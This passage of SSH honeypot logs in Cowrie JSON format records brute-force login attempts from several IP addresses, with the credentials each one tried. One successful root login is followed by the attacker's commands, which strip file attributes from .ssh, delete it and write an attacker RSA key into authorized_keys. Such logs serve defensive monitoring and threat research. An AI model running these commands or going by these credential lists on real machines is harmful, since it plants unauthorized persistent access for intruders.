"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:37:41.220134Z","src_ip":"212.227.235.229","session":"77af024c70ac"}
{"eventid":"cowrie.login.failed","username":"testnet","password":"testnet","message":"login attempt [testnet/testnet] failed","sensor":"my-vps","timestamp":"2025-09-08T12:37:41.887566Z","src_ip":"212.227.235.229","session":"77af024c70ac"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:37:43.055501Z","src_ip":"212.227.235.229","session":"77af024c70ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50882,"dst_ip":"1.2.3.4","dst_port":22,"session":"f742ad10d6b6","protocol":"ssh","message":"New connection: 212.227.235.229:50882 (1.2.3.4:22) [session: f742ad10d6b6]","sensor":"my-vps","timestamp":"2025-09-08T12:38:16.202838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:38:16.203763Z","src_ip":"212.227.235.229","session":"f742ad10d6b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:38:16.461232Z","src_ip":"212.227.235.229","session":"f742ad10d6b6"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"123456","message":"login attempt [odoo/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T12:38:17.533989Z","src_ip":"212.227.235.229","session":"f742ad10d6b6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:38:18.794845Z","src_ip":"212.227.235.229","session":"f742ad10d6b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53004,"dst_ip":"1.2.3.4","dst_port":22,"session":"155867310e65","protocol":"ssh","message":"New connection: 212.227.235.229:53004 (1.2.3.4:22) [session: 155867310e65]","sensor":"my-vps","timestamp":"2025-09-08T12:38:24.148878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:38:24.150013Z","src_ip":"212.227.235.229","session":"155867310e65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:38:24.439773Z","src_ip":"212.227.235.229","session":"155867310e65"}
{"eventid":"cowrie.login.failed","username":"private","password":"Password","message":"login attempt [private/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T12:38:25.650192Z","src_ip":"212.227.235.229","session":"155867310e65"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:38:26.944374Z","src_ip":"212.227.235.229","session":"155867310e65"}
{"eventid":"cowrie.session.connect","src_ip":"194.34.133.19","src_port":43462,"dst_ip":"1.2.3.4","dst_port":22,"session":"50f2c4b07209","protocol":"ssh","message":"New connection: 194.34.133.19:43462 (1.2.3.4:22) [session: 50f2c4b07209]","sensor":"my-vps","timestamp":"2025-09-08T12:38:40.668169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:38:40.668829Z","src_ip":"194.34.133.19","session":"50f2c4b07209"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:38:40.697040Z","src_ip":"194.34.133.19","session":"50f2c4b07209"}
{"eventid":"cowrie.login.failed","username":"web","password":"web@123","message":"login attempt [web/web@123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:38:40.848408Z","src_ip":"194.34.133.19","session":"50f2c4b07209"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39072,"dst_ip":"1.2.3.4","dst_port":22,"session":"eda5dd5508b4","protocol":"ssh","message":"New connection: 212.227.235.229:39072 (1.2.3.4:22) [session: eda5dd5508b4]","sensor":"my-vps","timestamp":"2025-09-08T12:38:41.214537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:38:41.215630Z","src_ip":"212.227.235.229","session":"eda5dd5508b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:38:41.343252Z","src_ip":"212.227.235.229","session":"eda5dd5508b4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:38:41.878537Z","src_ip":"194.34.133.19","session":"50f2c4b07209"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"Password1","message":"login attempt [sonar/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T12:38:41.897561Z","src_ip":"212.227.235.229","session":"eda5dd5508b4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:38:43.028035Z","src_ip":"212.227.235.229","session":"eda5dd5508b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37420,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8f7b319035c","protocol":"ssh","message":"New connection: 212.227.235.229:37420 (1.2.3.4:22) [session: b8f7b319035c]","sensor":"my-vps","timestamp":"2025-09-08T12:38:52.853077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:38:52.853724Z","src_ip":"212.227.235.229","session":"b8f7b319035c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:38:53.014133Z","src_ip":"212.227.235.229","session":"b8f7b319035c"}
{"eventid":"cowrie.login.failed","username":"centos","password":"2025","message":"login attempt [centos/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T12:38:53.692845Z","src_ip":"212.227.235.229","session":"b8f7b319035c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:38:54.855482Z","src_ip":"212.227.235.229","session":"b8f7b319035c"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":60326,"dst_ip":"1.2.3.4","dst_port":22,"session":"72bb2e58439f","protocol":"ssh","message":"New connection: 139.59.14.27:60326 (1.2.3.4:22) [session: 72bb2e58439f]","sensor":"my-vps","timestamp":"2025-09-08T12:38:55.094864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:38:55.096784Z","src_ip":"139.59.14.27","session":"72bb2e58439f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:38:55.463016Z","src_ip":"139.59.14.27","session":"72bb2e58439f"}
{"eventid":"cowrie.login.failed","username":"enable","password":"password","message":"login attempt [enable/password] failed","sensor":"my-vps","timestamp":"2025-09-08T12:38:56.958917Z","src_ip":"139.59.14.27","session":"72bb2e58439f"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:38:58.322946Z","src_ip":"139.59.14.27","session":"72bb2e58439f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44686,"dst_ip":"1.2.3.4","dst_port":22,"session":"8478c44cd80e","protocol":"ssh","message":"New connection: 212.227.235.229:44686 (1.2.3.4:22) [session: 8478c44cd80e]","sensor":"my-vps","timestamp":"2025-09-08T12:39:17.537628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:39:17.538747Z","src_ip":"212.227.235.229","session":"8478c44cd80e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:39:17.829101Z","src_ip":"212.227.235.229","session":"8478c44cd80e"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#qwe123","message":"login attempt [root/!@#qwe123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:39:19.026391Z","src_ip":"212.227.235.229","session":"8478c44cd80e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:39:19.649715Z","src_ip":"212.227.235.229","session":"8478c44cd80e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:39:19.650386Z","src_ip":"212.227.235.229","session":"8478c44cd80e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:39:19.651482Z","src_ip":"212.227.235.229","session":"8478c44cd80e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:39:19.943355Z","src_ip":"212.227.235.229","session":"8478c44cd80e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:39:20.612260Z","src_ip":"212.227.235.229","session":"8478c44cd80e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:39:20.612976Z","src_ip":"212.227.235.229","session":"8478c44cd80e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:39:20.904252Z","src_ip":"212.227.235.229","session":"8478c44cd80e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:39:20.905090Z","src_ip":"212.227.235.229","session":"8478c44cd80e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46252,"dst_ip":"1.2.3.4","dst_port":22,"session":"373e572eea3d","protocol":"ssh","message":"New connection: 212.227.235.229:46252 (1.2.3.4:22) [session: 373e572eea3d]","sensor":"my-vps","timestamp":"2025-09-08T12:39:21.193019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:39:21.197429Z","src_ip":"212.227.235.229","session":"373e572eea3d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:39:21.486628Z","src_ip":"212.227.235.229","session":"373e572eea3d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:39:22.649051Z","src_ip":"212.227.235.229","session":"373e572eea3d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:39:23.943378Z","src_ip":"212.227.235.229","session":"373e572eea3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47570,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbb8332b8486","protocol":"ssh","message":"New connection: 212.227.235.229:47570 (1.2.3.4:22) [session: cbb8332b8486]","sensor":"my-vps","timestamp":"2025-09-08T12:39:24.246375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:39:24.247482Z","src_ip":"212.227.235.229","session":"cbb8332b8486"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:39:24.547262Z","src_ip":"212.227.235.229","session":"cbb8332b8486"}
